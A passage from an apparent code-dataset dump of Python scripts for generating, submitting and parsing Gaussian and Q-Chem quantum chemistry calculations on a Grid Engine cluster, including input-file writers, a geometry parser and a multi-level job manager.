in_name_list:\n script_name = write_sub_script(input_name=in_name,\n num_cores=args.numcores,\n time=args.time,\n verbose=args.verbose,\n executable=args.executable,\n chk_file=args.chk_file,\n copy_chk=args.copy_chk,\n ln_running=args.ln_running,\n hold_jid=args.hold_jid)\n script_list.append(script_name)\n if not len(script_list) == len(in_name_list):\n # This should never be the case as far as I know, but I would\n # like to make sure everything input gets a script and all the\n # script names are there to be submitted.\n raise IOError('num scripts dif. from num names given')\n job_info = submit_scripts(script_list, args.batch, args.submit,\n args.verbose)\n if job_info and args.nojobinfo:\n for job in job_info:\n print(job)\n if args.verbose:\n print('Done. Completed normally.')\n"
},
{
"alpha_fraction": 0.5515587329864502,
"alphanum_fraction": 0.5573141574859619,
"avg_line_length": 38.339622497558594,
"blob_id": "cfcca45f68fc56d7834b0bb7e7a2d16ea73e3394",
"content_id": "03a7bed1e188ba9cea0e3338a6a78fb9170acb4c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2085,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 53,
"path": "/gautools/geomRegex.py",
"repo_name": "theavey/QM-calc-scripts",
"src_encoding": "UTF-8",
"text": "__author__ = 'Thomas Heavey'\n\nimport re\n\nfilename = \"testg.out\"\n\ndef findallgeoms(filename):\n \"\"\"A function that takes a file name and returns a list of\n geometries. Works with Gaussian output, haven't checked with\n Q-Chem.\"\"\"\n relevantelem = [1,3,4,5]\n xyzformat = '{:>2} {: f} {: f} {: f}'\n geomregex = re.compile(\n r'(?:Standard orientation)' # non-capturing (nc) start of geometry\n r'(?:.+?)' # nc geometry header\n r'((?:(?:\\s+\\d+\\s+)' # nc atom number\n r'(\\d+\\s+)' # (capturing) atomic number\n r'(?:\\d+\\s+)' # nc atomic type\n r'(-?\\d+\\.\\d+\\s*){3,3}' # 3 cartesian coordinates (x,y,z)\n r')+)' # repeat for at least one atom\n r'(?:-)' # nc end at line of dashes\n , re.DOTALL)\n\n with open(filename, 'r') as file:\n allxyz = []\n geoms = geomregex.finditer(file.read())\n for geom in geoms:\n thisxyz = []\n mlgeom = geom.group(1)\n for line in mlgeom.split('\\n'):\n # Ignore blank lines:\n if len(line) < 2:\n continue\n xyzelemstring = [line.split()[i] for i in relevantelem]\n xyzelemnum = [float(i) for i in xyzelemstring]\n xyzelemnum[0] = int(xyzelemstring[0])\n thisxyz.append(xyzformat.format(*xyzelemnum))\n allxyz.append(thisxyz)\n\n return(allxyz)\n# I don't know if I like this format. It would be reasonable for\n# Mathematica, but somewhat odd for Python. I guess for outputting\n# it though it won't be terrible because I can just double\n# iterate over the nested list, writing lines from the strings.\n# I'll need to pick a separator for between geometries maybe but that's\n# not a problem. Also with this format, should be easy to count number\n# of atoms.\n\n# Still need to have way to just find stationary points\n\nif __name__ == \"__main__\":\n print(findallgeoms(filename))\n# Ugly because returned as list of list of strings\n"
},
{
"alpha_fraction": 0.4030948877334595,
"alphanum_fraction": 0.4076610803604126,
"avg_line_length": 46.817073822021484,
"blob_id": "44bba41a231ae35baab79b2a629d2fa462b07a49",
"content_id": "a520183c4805dcffd62f5eea3d7afa72b9008a82",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3942,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 82,
"path": "/gautools/create_runs.py",
"repo_name": "theavey/QM-calc-scripts",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3.4\n\n########################################################################\n# #\n# #\n# #\n# Known issues: #\n# None #\n# #\n# . #\n# #\n# This script was written by Thomas Heavey in 2015. #\n# [email protected] [email protected] #\n# #\n# Copyright 2015 Thomas J. Heavey IV # \n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\"); #\n# you may not use this file except in compliance with the License. #\n# You may obtain a copy of the License at #\n# #\n# http://www.apache.org/licenses/LICENSE-2.0 #\n# #\n# Unless required by applicable law or agreed to in writing, software #\n# distributed under the License is distributed on an \"AS IS\" BASIS, #\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or #\n# implied. #\n# See the License for the specific language governing permissions and #\n# limitations under the License. #\n# #\n########################################################################\n\n\n\n\n# This is written to work with python 3.4 because it should be good to\n# be working on the newest version of python.\n\nimport fileinput # allows easy iteration over a file\nimport sys # For importing the arguments given\nimport re # RegEx package for sorting data\nimport os.path # Allows for checking if file already exists\nimport glob # Iteration over files in directory\n\n\nbase_name = sys.argv[1]\ntemplate_file = sys.argv[2]\nin_name_list = glob.glob(base_name + '*.inp')\n\nin_name_list.sort()\nin_name_list.sort(key=len)\n\nprint('base file name is {}'.format(base_name))\nprint('number of files is {:,}'.format(len(in_name_list)))\nprint('template file name is {}'.format(template_file))\n\n\nfor in_name in in_name_list:\n job_name = in_name.replace('.inp', '')\n run_name = job_name + '.run'\n out_name = job_name + '.out'\n with open(run_name, 'w') as run_file:\n with open(template_file, 'r') as templ:\n for line in templ:\n # Note, in most places, these lines are \"stripped\" because\n # they come with leading spaces, which messes with\n # startswith and the split function, too I think.\n if line.strip().startswith('cd'):\n # make the line into a list split by slashes\n line = line.replace('ReplaceMe', base_name)\n run_file.write(line)\n continue\n if line.strip().startswith('qchem'):\n line = line.replace('ReplaceMeIn', in_name )\n line = line.replace('ReplaceMeOut', out_name)\n run_file.write(line)\n continue\n if line.strip().startswith('#PBS'):\n line = line.replace('ReplaceMe', job_name)\n run_file.write(line)\n continue\n # else:\n run_file.write(line)\n\n\n\n\n \n"
},
{
"alpha_fraction": 0.5443902611732483,
"alphanum_fraction": 0.552195131778717,
"avg_line_length": 26.70270347595215,
"blob_id": "1a73b63636a1622afa4d7c6aa66db25715d73a7d",
"content_id": "698d26f6505cebb5bd5605ded80924b884acc4db",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1025,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 37,
"path": "/setup.py",
"repo_name": "theavey/QM-calc-scripts",
"src_encoding": "UTF-8",
"text": "from setuptools import setup\n\nsetup(\n name='gautools',\n packages=['gautools'],\n scripts=[\n 'gautools/aml.py',\n 'gautools/create_runs.py',\n 'gautools/geomRegex.py',\n 'gautools/out_to_list.py',\n 'gautools/out_to_list_sf.py',\n 'gautools/submit_gaussian.py',\n 'gautools/xtorun.py',\n 'gautools/xyz_to_inp.py',\n 'gautools/xyz_to_inpglob.py',\n ],\n url='https://github.com/theavey/QM-calc-scripts',\n license='Apache License 2.0',\n author='Thomas Heavey',\n author_email='[email protected]',\n description='A set of scripts that are useful for creating, submitting, '\n 'and processing QM calculations',\n install_requires=[\n 'MDAnalysis>=0.17.0',\n 'thtools',\n 'numpy',\n 'six',\n 'paratemp',\n 'parmed',\n ],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Science/Research',\n 'Programming Language :: Python :: 3',\n ],\n zip_safe=True,\n)\n"
},
{
"alpha_fraction": 0.43423470854759216,
"alphanum_fraction": 0.43843528628349304,
"avg_line_length": 41.32222366333008,
"blob_id": "505e8db4756d3ef9dfb62a112ca74ed863a4b16f",
"content_id": "380110f266977ee2e70574e861bca7569ca29389",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3809,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 90,
"path": "/ConfigFileManager.py",
"repo_name": "theavey/QM-calc-scripts",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3.4\n\n########################################################################\n# #\n# #\n# #\n# Known issues: #\n# #\n# #\n# #\n# This script was written by Thomas Heavey in 2015. #\n# [email protected] [email protected] #\n# #\n# Copyright 2015 Thomas J. Heavey IV #\n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\"); #\n# you may not use this file except in compliance with the License. #\n# You may obtain a copy of the License at #\n# #\n# http://www.apache.org/licenses/LICENSE-2.0 #\n# #\n# Unless required by applicable law or agreed to in writing, software #\n# distributed under the License is distributed on an \"AS IS\" BASIS, #\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or #\n# implied. #\n# See the License for the specific language governing permissions and #\n# limitations under the License. #\n# #\n########################################################################\n\n# Import Statements\nimport os # Generally good for referencing files\n\n# todo define as a class?\ndef configmanager(basename, filename=\".config\"):\n \"\"\"Function for managing a file for the current state of a\n calculation.\n .config is the file name by default\n It has a structure of keyword (whitespace) value on each line\n lines starting with # are completely ignored, but also unrecognized\n keywords are currently not interpretted as anything (I think).\"\"\"\n configexists = checkforconfig(filename)\n # todo print if one exists, and what is being done about it\n pass\n # todo Obviously need to do this\n\n\n\ndef checkforconfig(filename):\n \"\"\"Return True if one exists, False if not.\n Uses os\"\"\"\n return(os.path.isfile(filename))\n\n\n\n\ndef makenewconfig(basename, filename, **starting_values):\n \"\"\"\"\"\"\n with open(filename, 'x') as file:\n file.write('basename {}\\n'.format(basename))\n for key in starting_values:\n file.write('{} {}'.format(key, starting_values[key]))\n print(\"Wrote new configuration file to {}\".format(filename))\n\n\n\ndef readconfig(filename):\n \"\"\"\"\"\"\n filedata = dict()\n with open(filename, 'r') as file:\n for line in file:\n # take off leading and trailing whitespace\n line = line.strip()\n # ignore commented lines\n if line.startswith(\"#\"):\n continue\n # add first two parts of each line to the dictionary for\n # output as key: value pairs\n filedata.update(line.split()[0:1])\n print(\"Read configuration file {}\".format(filename))\n return(filedata)\n\n\n\n\ndef updateconfig(filename, **added_values):\n \"\"\"\"\"\"\n with open(filename, 'a') as file:\n for key in added_values:\n file.write('{} {}'.format(key, added_values[key]))\n"
},
{
"alpha_fraction": 0.5499294996261597,
"alphanum_fraction": 0.5562059283256531,
"avg_line_length": 37.9560432434082,
"blob_id": "4c7566f4b012cac2490aaa383988304f00dea34e",
"content_id": "2171158a476e0427ddda105b1e6561fa28f090ee",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14180,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 364,
"path": "/gautools/tools.py",
"repo_name": "theavey/QM-calc-scripts",
"src_encoding": "UTF-8",
"text": "\"\"\"\nA set of tools for working with computational chemistry files and such\n\"\"\"\n\n\n########################################################################\n# #\n# This script was written by Thomas Heavey in 2019. #\n# [email protected] [email protected] #\n# #\n# Copyright 2015-2019 Thomas J. Heavey IV #\n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\"); #\n# you may not use this file except in compliance with the License. #\n# You may obtain a copy of the License at #\n# #\n# http://www.apache.org/licenses/LICENSE-2.0 #\n# #\n# Unless required by applicable law or agreed to in writing, software #\n# distributed under the License is distributed on an \"AS IS\" BASIS, #\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or #\n# implied. #\n# See the License for the specific language governing permissions and #\n# limitations under the License. #\n# #\n########################################################################\n\nimport re\nimport pathlib\nfrom six import string_types\n\nfrom .oniom import OniomUniverse\nfrom paratemp import copy_no_overwrite\n\n\ndef fix_atom_names_xyz(xyz, dry_run=False, return_list=False):\n \"\"\"\n Fix atomic symbols in xyz file\n\n VMD (sometimes?) writes XYZ files with the atomic symbols replaced with\n the atom names, which cause issues with other programs interpreting them.\n This should fix them by leaving only the first letter of each atom\n name/symbol.\n\n !! NOTE !! This is only written to work for C, H, O, N, and F currently !!\n\n :param str xyz: Name of the XYZ file to fix. It will be written to the\n same name but a backup will be made with '.bak.' added at the\n beginning of the name.\n :param bool dry_run: Default: False. If true, the output will not be\n written (but a file named 'test-temp.xyz' will be created/overwritten).\n :param bool return_list: Default: False. If True, the output will be\n written to 'test-temp.xyz' and the lines of the fixed file will be\n returned as a list of strings.\n :return: If return_list, a list of strings of the lines of the fixed XYZ\n file, otherwise None.\n :rtype: List[str] or None\n \"\"\"\n if not dry_run and not return_list:\n xyz_c = '.bak.'+xyz\n copy_no_overwrite(xyz, xyz_c)\n else:\n xyz_c = xyz\n xyz = 'test-temp.xyz'\n\n def atom_name_sub(m):\n return m.group(1) + ' '*(len(m.group(0))-1)\n lines = [] # Could make this actually not write to the temp file\n with open(xyz_c, 'r') as f_in, open(xyz, 'w') as f_out:\n for i, line in enumerate(f_in):\n if i > 1: # skip header lines\n line = re.sub(r'([CHONF])\\S*',\n atom_name_sub,\n line)\n lines += line\n if not dry_run:\n f_out.write(line)\n else:\n print(line)\n if return_list:\n return lines\n\n\ndef use_gen_template(out_file, xyz, job_name='default job name',\n checkpoint='checkpoint.chk',\n rwf='readwrite.rwf',\n nproc=16, mem=125,\n opt='opt', td=False,\n func='wb97xd', basis='6-31g(d)',\n charg_mult='0 1',\n footer='\\n\\n',\n template='/projectnb/nonadmd/theavey'\n '/qm-basics/templ-gen.txt'):\n \"\"\"\n Use general template file to write Gaussian input file\n\n :type out_file: str or TextIOBase\n :param out_file: name of file or open file object to write output to\n :type xyz: str or list\n :param xyz: List of lines from an xyz file or string of path to an xyz\n file.\n :param str job_name: Default: 'default job name'. Name of the job to put\n into the Gaussian input.\n :param str checkpoint: Default: 'checkpoint.cpt'. File name for the\n checkpoint file.\n :param str rwf: Default: 'readwrite.rwf'. File name for the read-write\n file.\n :type nproc: int or str\n :param nproc: Default: 16. Number of processors to tell Gaussian to use.\n Note, this now uses the newer '%cpu' syntax, and I'm not sure how\n that will work using fewer than all CPUs on the node because it says\n to use 0 to nproc-1.\n :type mem: int or str\n :param mem: Default: 125. Number of gigabytes of memory to tell Gaussian\n to use.\n :param str opt: Default: 'opt'. Opt keywords to tell Gaussian.\n If True, this will be set to 'opt'.\n If this evaluates to False, it will be set to the blank string.\n :param str td: Default: False. TD keywords to tell Gaussian.\n If True, this will be set to TD.\n If this evaluates to False, it will be set to the blank string.\n :param str func: Default: 'wb97xd'. Functional for Gaussian to use.\n :param str basis: Default: '6-31g(d)'. Basis set for Gaussian to use.\n :param str charg_mult: Default: '0 1'. Charge and multiplicity line.\n :param str footer: Default: '\\n\\n'. Footer of input file. Useful for RESP\n charge calculation jobs and such.\n :param str template: Default: '~nbth/qm-basics/templ-gen.txt'.\n The general template file to use. It should have keywords in curly\n braces with the same names as the keyword arguments to this function.\n :return: None\n \"\"\"\n if opt:\n if opt is True:\n opt = 'opt'\n else:\n opt = ''\n if td:\n if td is True:\n td = 'TD'\n else:\n td = ''\n d_fill = dict(job_name=job_name,\n checkpoint=checkpoint, rwf=rwf,\n nproc=str(int(nproc)-1), mem=str(mem),\n opt=opt, td=td,\n func=func, basis=basis,\n charg_mult=charg_mult)\n xyz_lines = _get_xyz_lines(xyz)\n own_handle = False\n if isinstance(out_file, string_types):\n own_handle = True\n out_file = open(out_file, 'x')\n try:\n with open(template, 'r') as f_templ:\n line = '' # To satisfy IDE in case of empty template\n for line in f_templ:\n line = line.format(**d_fill)\n out_file.write(line)\n if '\\n' not in line:\n out_file.write('\\n')\n for line in xyz_lines:\n out_file.write(line)\n out_file.write(footer)\n finally:\n if own_handle:\n out_file.close()\n\n\ndef make_gaussian_input(out_file, xyz, job_name='default job name',\n checkpoint='checkpoint.chk',\n rwf='readwrite.rwf',\n nproc=16, mem=125,\n route=None,\n opt='opt', td=False,\n func='wb97xd', basis='6-31g(d)',\n route_other=None,\n charg_mult='0 1',\n footer=None,\n oniom: dict = None):\n \"\"\"\n Write Gaussian input file\n\n :type out_file: str or TextIOBase\n :param out_file: name of file or open file object to write output to\n\n :type xyz: str or list\n :param xyz: List of lines from an xyz file or string of path to an xyz\n file.\n\n :param str job_name: Default: 'default job name'. Name of the job to put\n into the Gaussian input.\n\n :param str checkpoint: Default: 'checkpoint.cpt'. File name for the\n checkpoint file.\n\n :param str rwf: Default: 'readwrite.rwf'. File name for the read-write\n file.\n\n :type nproc: int or str\n :param nproc: Default: 16. Number of processors to tell Gaussian to use.\n Note, this now uses the newer '%cpu' syntax, and I'm not sure how\n that will work using fewer than all CPUs on the node because it says\n to use 0 to nproc-1.\n\n :type mem: int or str\n :param mem: Default: 125. Number of gigabytes of memory to tell Gaussian\n to use.\n\n :param str route: If not None, this will be the entire route section and\n the following commands will be ignored: `opt`, `td`, `func`, `basis`.\n\n :param str opt: Default: 'opt'. Opt keywords to tell Gaussian.\n If True, this will be set to 'opt'.\n If this evaluates to False, it will be set to the blank string.\n If something else, it will be set to the given string.\n\n :param str td: Default: False. TD keywords to tell Gaussian.\n If True, this will be set to TD.\n If this evaluates to False, it will be set to the blank string.\n If something else, it will be set to the given string.\n\n :param str func: Default: 'wb97xd'. Functional for Gaussian to use.\n If True or evaluates as false, it will be set to a blank string,\n which will likely be an error.\n\n :param str basis: Default: '6-31g(d)'. Basis set for Gaussian to use.\n If True or evaluates as false, it will be set to a blank string,\n which will likely be an error.\n\n :param str route_other: Other commands to use in the route section\n (e.g., 'SCRF=(solvent=dichloromethane) Int=Ultrafile freq')\n\n :param str charg_mult: Default: '0 1'. Charge and multiplicity line.\n\n :param str footer: Default: None. Footer of input file. Useful for RESP\n charge calculation jobs and such.\n\n :param dict oniom: dict to pass to :py:class:`gautools.oniom.OniomUniverse`\n constructor. The create object will then be used to make the molecule\n specification, and add the connectivity and MM parameters to the footer.\n :return: The Path to the written file\n :rtype: pathlib.Path\n \"\"\"\n link0 = _make_link0(checkpoint, rwf, str(int(nproc)-1), mem)\n route_sec = _make_route(route, opt, td, func, basis, route_other)\n if oniom is not None:\n ou = OniomUniverse(**oniom)\n xyz_lines = ou.molecule_section\n bon_sec = ''.join(ou.bonds_section)\n par_sec = ''.join(ou.params_section)\n if footer is None:\n footer_list = [bon_sec, par_sec]\n else:\n footer_list = [bon_sec, footer, par_sec]\n # This should be the right order in most cases:\n # http://gaussian.com/input/\n footer = '\\n'.join(footer_list)\n else:\n xyz_lines = _get_xyz_lines(xyz)\n if _geom_checkpoint(route_sec):\n xyz_lines = []\n own_handle = False\n if isinstance(out_file, string_types):\n own_handle = True\n out_file_path = pathlib.Path(out_file)\n out_file = open(out_file, 'x')\n else:\n out_file_path = pathlib.Path(out_file.name)\n try:\n out_file.write(link0)\n out_file.write(route_sec)\n out_file.write('\\n') # blank line between sections\n out_file.write(_make_newline_terminated(job_name))\n out_file.write('\\n') # blank line between sections\n out_file.write(_make_newline_terminated(charg_mult))\n if xyz_lines:\n line = '' # in case xyz_lines is empty (for IDE)\n for line in xyz_lines:\n out_file.write(line)\n sec_break = '\\n' if (line[-1] == '\\n') else '\\n\\n'\n out_file.write(sec_break)\n else:\n out_file.write('\\n') # blank line between sections\n if footer:\n out_file.write(_make_newline_terminated(footer))\n out_file.write('\\n') # blank line before end of file\n finally:\n if own_handle:\n out_file.close()\n return out_file_path.resolve()\n\n\n_link0_template_dict = {'nproc': '%cpu=0-{nproc}',\n 'mem': '%mem={mem}GB',\n 'rwf': '%rwf={rwf}\\n%NoSave',\n 'checkpoint': '%chk={checkpoint}'}\n\n\ndef _make_link0(checkpoint, rwf, nproc, mem):\n # http://gaussian.com/link0/\n output = []\n kwarg_dict = dict()\n # want at least rwf and checkpoint to be ordered (for %NoSave),\n # so this might not be perfect in Python < 3.6\n kwarg_dict['mem'] = mem\n kwarg_dict['nproc'] = nproc\n kwarg_dict['rwf'] = rwf\n kwarg_dict['checkpoint'] = checkpoint\n for key in kwarg_dict:\n if kwarg_dict[key]:\n output.append(_link0_template_dict[key].format(**kwarg_dict))\n if output:\n return _make_newline_terminated('\\n'.join(output))\n else:\n return str()\n\n\n_route_template = '# {opt} {td} {func}/{basis} {route_other}'\n\n\ndef _make_route(route, opt, td, func, basis, route_other):\n if route:\n if not route[0] == '#':\n route = '# ' + route\n return _make_newline_terminated(route)\n kwarg_dict = dict(opt=opt, td=td, func=func,\n basis=basis, route_other=route_other)\n defaults_dict = dict(\n opt='opt', td='TD',\n func='', basis='', # not sure what good defaults are here\n route_other='')\n for key in kwarg_dict:\n kwarg_dict[key] = _process_keyword(kwarg_dict[key],\n defaults_dict[key])\n return _make_newline_terminated(_route_template.format(**kwarg_dict))\n\n\ndef _process_keyword(key, key_default):\n if key:\n key = key_default if key is True else key\n else:\n key = ''\n return key\n\n\ndef _get_xyz_lines(xyz):\n if isinstance(xyz, string_types):\n xyz_lines = open(xyz, 'r').readlines()[2:]\n else:\n xyz_lines = xyz[2:]\n return xyz_lines\n\n\ndef _make_newline_terminated(line):\n if line[-1] == '\\n':\n return line\n else:\n return line + '\\n'\n\n\ndef _geom_checkpoint(route):\n match = re.search(r'geom=\\S*?checkpoint',\n route, re.IGNORECASE)\n return True if match else False\n"
},
{
"alpha_fraction": 0.5470374226570129,
"alphanum_fraction": 0.5498037338256836,
"avg_line_length": 40.91218948364258,
"blob_id": "39e3d4dcc75ff033d0f1809bc48fca67602d6721",
"content_id": "8f3cd51de734f444ef96ec50f971016a6fc8f26b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 49163,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 1173,
"path": "/gautools/aml.py",
"repo_name": "theavey/QM-calc-scripts",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\n\"\"\"\nRun QM calculations at multiple levels consecutively, using queuing system\n\nAutomate Multi-Level calculations\n\nThis should help with running a set of QM calculations at several levels (e.g.,\nincreasing basis set size), while intelligently using the queuing system such\nas Sun Grid Engine.\nIt can receive the signal from the queuing system that the job will be killed\nsoon and consequently submit a continuation of the job, using the\nintermediate files to speed up subsequent calculations.\n\"\"\"\n\n########################################################################\n# #\n# This script/module was written by Thomas Heavey in 2019. #\n# [email protected] [email protected] #\n# #\n# Copyright 2018-2019 Thomas J. Heavey IV #\n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\"); #\n# you may not use this file except in compliance with the License. #\n# You may obtain a copy of the License at #\n# #\n# http://www.apache.org/licenses/LICENSE-2.0 #\n# #\n# Unless required by applicable law or agreed to in writing, software #\n# distributed under the License is distributed on an \"AS IS\" BASIS, #\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or #\n# implied. #\n# See the License for the specific language governing permissions and #\n# limitations under the License. #\n# #\n########################################################################\n\nimport json\nimport logging\nimport MDAnalysis as mda\nimport numpy as np\nimport os\nimport pandas as pd\nimport paratemp\nfrom paratemp.geometries import XYZ\nimport pathlib\nimport random\nimport re\nimport shutil\nimport signal\nimport subprocess\nimport sys\nimport threading\nimport thtools\nimport time\nfrom typing import List\nfrom gautools import tools\nimport functools\nimport filecmp\n\nif not sys.version_info >= (3, 6):\n raise ValueError('Python >= 3.6 is required')\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\n\n\ndef _setup_log(level=logging.WARNING):\n global handler\n handler = logging.StreamHandler()\n handler.setLevel(level=level)\n formatter = logging.Formatter('%(asctime)s - %(name)s - '\n '%(levelname)s - %(message)s')\n handler.setFormatter(formatter)\n log.addHandler(handler)\n\n\nobabel_module_lines = ('\\n'\n 'module load wxwidgets/3.0.2\\n'\n 'module load openbabel/2.4.1\\n')\n\nsignal_catch_lines = ('PY_PID=$!\\n'\n 'trap \"kill -n 12 $PY_PID\" usr2\\n'\n 'wait\\n\\n')\n\n\ndef log_exception(f):\n @functools.wraps(f)\n def log_exc(*args, **kwargs):\n try:\n return f(*args, **kwargs)\n except Exception:\n log.exception(f'An exception was raised in {f.__name__}!')\n raise\n\n return log_exc\n\n\nclass Calc(object):\n \"\"\"\n An object for consecutive Gaussian calculation using a queuing system\n\n Environment variables that need to be defined:\n * HOSTNAME\n * JOB_ID\n * NSLOTS\n * SGE_STDOUT_PATH\n An exception will be raised if any of these are not defined when doing\n :func:`Calc.run_calc()`.\n \"\"\"\n\n def __init__(self, status=None, base_name=None, ind=None,\n geometry=None, top=None, traj=None,\n criteria=None, react_dist=None, mgi_dicts=None):\n \"\"\"\n\n :param str status: The path to the status file to be read for a\n calculation restart. If this is not a restarted job, this should\n be None (the default).\n :param str base_name:\n :param int ind:\n :type geometry: pathlib.Path or str\n :param geometry: File from which to get the starting coordinates. This\n argument will take priority if top and traj are also given.\n Currently, this must be an XYZ file, but it shouldn't be too hard\n to implement using openbabel to convert to an XYZ.\n :type top: pathlib.Path or str\n :param top:\n :type traj: pathlib.Path or str\n :param traj:\n :param dict criteria: The criteria for selecting frames from the\n trajectory.\n This is a dict with distance names (or other columns that will\n be in `Universe.data`) as the keys and the values being a\n List-like of min and max values.\n For example, `{'c1_c2': (1.5, 4.0), 'c1_c3': (2.2, 5.1)}` will\n select frames where 'c1_c2' is between 1.5 and 4.0 and 'c1_c3'\n is between 2.2 and 5.1.\n :type react_dist: str or float\n :param react_dist: Distance to set between the two reacting atoms (\n with indices 20 and 39).\n If this argument as given evaluates to False, no movement/changes\n to the geometry will be made.\n :param List[dict] mgi_dicts:\n :return:\n \"\"\"\n if status is not None:\n # TODO this could be done (better?) with a classmethod\n self.rerun = True\n self._status = StatusDict(status)\n self._json_name = status\n try:\n self.args = self.status['args']\n except KeyError:\n self.log.error('Attempting to do a calculation restart, '\n f'but it seems that the status file {status} '\n 'was empty or at least did not have \"args\" in '\n 'it.')\n raise\n a = self.args\n base_name = a['base_name']\n ind = a['ind']\n try:\n geometry = a['geometry']\n except KeyError:\n geometry = None\n top = a['top']\n traj = a['traj']\n criteria = a['criteria']\n react_dist = a['react_dist']\n try:\n mgi_dicts = a['mgi_dicts']\n except KeyError:\n mgi_dicts = a['ugt_dicts']\n self._base_name = self.status['base_name']\n else:\n self.rerun = False\n self.args = {\n 'base_name': base_name,\n 'ind': ind, 'geometry': geometry,\n 'top': top, 'traj': traj,\n 'criteria': criteria,\n 'react_dist': react_dist,\n 'mgi_dicts': mgi_dicts}\n self.oniom = True if 'oniom' in mgi_dicts[0].keys() else False\n self.check_args()\n self._base_name = '{}-ind{}'.format(base_name, ind)\n self._json_name = '{}.json'.format(self._base_name)\n self._status = StatusDict(self._json_name)\n self.geometry = geometry\n self.top = top\n self.traj = traj\n self.criteria = criteria\n self.react_dist = react_dist\n self.mgi_dicts = mgi_dicts\n self.log = logging.getLogger(self.__class__.__name__)\n self.log.setLevel(logging.DEBUG)\n f_handler = logging.FileHandler('{}.log'.format(self._base_name))\n f_handler.setLevel(logging.DEBUG)\n f_formatter = logging.Formatter('%(asctime)s - %(name)s - '\n '%(levelname)s - %(message)s')\n f_handler.setFormatter(f_formatter)\n self.log.addHandler(f_handler)\n self.log.addHandler(handler)\n self.log.debug('Initializing the log')\n self.mem, self.node = None, None\n self.scratch_path: pathlib.Path = None\n self.last_scratch_path: pathlib.Path = None\n self.n_slots, self.last_node = None, None\n self.cwd_path: pathlib.Path = None\n self.output_scratch_path: pathlib.Path = None\n self.chk_ln_path: pathlib.Path = None\n self.h_rt: str = None\n self.stdout_file: str = None\n self.resub_cl: List[str] = None\n self.job_id: str = None\n self.next_job_id: str = None\n self.resubmitted: bool = False\n\n def check_args(self):\n args = self.args.copy()\n geom = args.pop('geometry')\n top, traj = args.pop('top'), args.pop('traj')\n crit = args.pop('criteria')\n if (geom is None and\n (top is None or traj is None or crit is None) and\n (not self.oniom)):\n raise ValueError('either geometry or top, traj, and criteria must '\n 'be given')\n for key in args:\n if args[key] is None:\n raise ValueError(f'Argument \"{key}\" cannot be None')\n\n @property\n def status(self):\n return self._status\n\n @property\n def current_lvl(self):\n try:\n return self.status['current_lvl']\n except KeyError:\n raise AttributeError('Could not find current level')\n\n @current_lvl.setter\n def current_lvl(self, value):\n if not (isinstance(value, int) or value is None):\n raise TypeError('current_level must be an int or None.'\n f'Given type {type(value)}')\n self.status['current_lvl'] = value\n\n @property\n def between_levels(self):\n # Might need to look for rwf file otherwise should start the\n # calculation again\n self.log.debug('Checking to see if calculation left off between '\n 'calculation levels')\n between = self.status['between_levels']\n if between is None:\n self.log.warning('No key in status for determining if between '\n 'levels currently')\n lvl = self.current_lvl\n if self.status[f'g_in_{lvl}'] == self.status['g_in_curr']:\n out_path = pathlib.Path(\n self.status['g_in_curr']).with_suffix('.out')\n if out_path.exists():\n self._advance_level()\n between = True\n else:\n between = False\n else:\n between = True\n self.status['between_levels'] = between\n return between\n\n @between_levels.setter\n def between_levels(self, value):\n if not isinstance(value, bool):\n raise TypeError(f'between_levels must be a bool, given type '\n f'{type(value)}')\n self.status['between_levels'] = value\n\n @property\n def cleaned_up(self):\n cleaned = self.status['cleaned_up']\n if cleaned is None:\n self.log.warning('Could not find \"cleaned_up\" in status. Assuming '\n 'dirty')\n cleaned = False\n self.status['cleaned_up'] = cleaned\n return cleaned\n\n @cleaned_up.setter\n def cleaned_up(self, value):\n if not isinstance(value, bool):\n raise TypeError(f'cleaned_up must be a bool, given type '\n f'{type(value)}')\n self.status['cleaned_up'] = value\n\n def _startup_tasks(self):\n \"\"\"\n Some startup tasks to set variables for later use\n\n This requires the environment variables HOSTNAME and NSLOTS be set.\n :return: None\n \"\"\"\n self.log.debug('Running some introductory tasks and setting variables')\n try:\n node = os.environ['HOSTNAME'].split('.')[0]\n except KeyError:\n self.log.exception('Could not find HOSTNAME!')\n raise\n self.node = node\n scratch_path = pathlib.Path('/net/{}/scratch/theavey'.format(node))\n scratch_path.mkdir(exist_ok=True)\n self.scratch_path = scratch_path\n try:\n self.job_id = os.environ['JOB_ID']\n except KeyError:\n self.log.exception('Could not find JOB_ID!')\n raise\n self.mem = thtools.job_tools.get_node_mem()\n try:\n n_slots = int(os.environ['NSLOTS'])\n except KeyError:\n self.log.exception('Could not find NSLOTS!')\n raise\n self.n_slots = n_slots\n self.h_rt = self._get_h_rt()\n self.log.info(f'Running on {node} using {n_slots} cores and up to '\n f'{self.mem} GB mem for {self.h_rt} seconds')\n try:\n self.stdout_file = os.environ['SGE_STDOUT_PATH']\n self.log.debug(f'Using stdout path: {self.stdout_file}')\n except KeyError:\n self.log.exception('Could not find 